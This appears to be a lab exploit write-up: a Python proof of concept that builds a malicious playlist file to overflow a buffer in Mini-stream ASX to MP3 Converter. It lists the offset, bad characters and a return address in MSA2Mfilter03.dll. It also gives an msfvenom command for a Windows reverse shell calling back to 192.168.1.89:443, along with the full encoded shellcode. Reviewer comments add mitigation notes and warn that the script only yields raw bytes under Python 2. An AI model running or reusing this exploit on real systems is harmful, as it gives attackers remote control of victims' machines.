badchar (steps omitted): \x00\x0a
offset (steps omitted): 17417
return address (steps omitted): MSA2Mfilter03.dll, 0x1005dacf
shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443 -f python -v shellcode -b "\x00\x0a"
# exploit.py
#
# Writes a proof-of-concept playlist file, exploit.pls, whose only content is
# one over-long "http://" entry. The layout matches the notes on this page:
#   "http://" | 17417 filler bytes | 4-byte return address | 4 bytes of "C" |
#   16 bytes of 0x90 | msfvenom-generated shellcode
#
# NOTE(review): the script concatenates a str ("http://", "A" * 17417, ...)
# with bytes literals (b"..."). That only behaves as a raw byte string where
# str and bytes are the same type, i.e. Python 2 -- presumably what the author
# ran; confirm before reproducing in a lab.
#
# Detection/mitigation note: the resulting file is a single line well over
# 17 KB with no playlist section header or key=value entries, so a length
# check on playlist entries (in the parser or in content inspection) is the
# natural control for this class of input.

# Payload bytes produced by the msfvenom command listed on this page
# (generated with \x00 and \x0a excluded as bad characters).
shellcode = b""
shellcode += b"\xdb\xc8\xb8\xa9\x83\xb2\x79\xd9\x74\x24\xf4"
shellcode += b"\x5d\x29\xc9\xb1\x52\x31\x45\x17\x83\xed\xfc"
shellcode += b"\x03\xec\x90\x50\x8c\x12\x7e\x16\x6f\xea\x7f"
shellcode += b"\x77\xf9\x0f\x4e\xb7\x9d\x44\xe1\x07\xd5\x08"
shellcode += b"\x0e\xe3\xbb\xb8\x85\x81\x13\xcf\x2e\x2f\x42"
shellcode += b"\xfe\xaf\x1c\xb6\x61\x2c\x5f\xeb\x41\x0d\x90"
shellcode += b"\xfe\x80\x4a\xcd\xf3\xd0\x03\x99\xa6\xc4\x20"
shellcode += b"\xd7\x7a\x6f\x7a\xf9\xfa\x8c\xcb\xf8\x2b\x03"
shellcode += b"\x47\xa3\xeb\xa2\x84\xdf\xa5\xbc\xc9\xda\x7c"
shellcode += b"\x37\x39\x90\x7e\x91\x73\x59\x2c\xdc\xbb\xa8"
shellcode += b"\x2c\x19\x7b\x53\x5b\x53\x7f\xee\x5c\xa0\xfd"
shellcode += b"\x34\xe8\x32\xa5\xbf\x4a\x9e\x57\x13\x0c\x55"
shellcode += b"\x5b\xd8\x5a\x31\x78\xdf\x8f\x4a\x84\x54\x2e"
shellcode += b"\x9c\x0c\x2e\x15\x38\x54\xf4\x34\x19\x30\x5b"
shellcode += b"\x48\x79\x9b\x04\xec\xf2\x36\x50\x9d\x59\x5f"
shellcode += b"\x95\xac\x61\x9f\xb1\xa7\x12\xad\x1e\x1c\xbc"
shellcode += b"\x9d\xd7\xba\x3b\xe1\xcd\x7b\xd3\x1c\xee\x7b"
shellcode += b"\xfa\xda\xba\x2b\x94\xcb\xc2\xa7\x64\xf3\x16"
shellcode += b"\x67\x34\x5b\xc9\xc8\xe4\x1b\xb9\xa0\xee\x93"
shellcode += b"\xe6\xd1\x11\x7e\x8f\x78\xe8\xe9\x70\xd4\xf3"
shellcode += b"\xb0\x18\x27\xf3\x43\x62\xae\x15\x29\x84\xe7"
shellcode += b"\x8e\xc6\x3d\xa2\x44\x76\xc1\x78\x21\xb8\x49"
shellcode += b"\x8f\xd6\x77\xba\xfa\xc4\xe0\x4a\xb1\xb6\xa7"
shellcode += b"\x55\x6f\xde\x24\xc7\xf4\x1e\x22\xf4\xa2\x49"
shellcode += b"\x63\xca\xba\x1f\x99\x75\x15\x3d\x60\xe3\x5e"
shellcode += b"\x85\xbf\xd0\x61\x04\x4d\x6c\x46\x16\x8b\x6d"
shellcode += b"\xc2\x42\x43\x38\x9c\x3c\x25\x92\x6e\x96\xff"
shellcode += b"\x49\x39\x7e\x79\xa2\xfa\xf8\x86\xef\x8c\xe4"
shellcode += b"\x37\x46\xc9\x1b\xf7\x0e\xdd\x64\xe5\xae\x22"
shellcode += b"\xbf\xad\xdf\x68\x9d\x84\x77\x35\x74\x95\x15"
shellcode += b"\xc6\xa3\xda\x23\x45\x41\xa3\xd7\x55\x20\xa6"
shellcode += b"\x9c\xd1\xd9\xda\x8d\xb7\xdd\x49\xad\x9d"

# The entry starts like a URL.
payload = "http://"
# Filler up to the offset recorded in the notes (17417).
payload += "A" * 17417
# 0x1005dacf in little-endian byte order: the return address the notes
# attribute to MSA2Mfilter03.dll.
# NOTE(review): a hard-coded address presumably relies on that module loading
# at a fixed base -- verify the module's ASLR/rebase status when assessing
# which mitigations apply.
payload += "\xcf\xda\x05\x10"
# Four placeholder bytes between the return address and the 0x90 run.
payload += "C" * 4
# Sixteen 0x90 bytes placed ahead of the shellcode.
payload += "\x90" * 16
payload += shellcode

# Write the whole entry as the only content of exploit.pls (text mode).
with open("exploit.pls" , "w" ) as fp:
    fp.write(payload)
proof: Load -> Playlist Files (*.m3u;*.pls;...)
Loading the playlist from any other directory crashes the application while Immunity Debugger is attached to it, so I copied exploit.pls to the directory C:\Program Files\Mini-stream\ASX to MP3 Converter.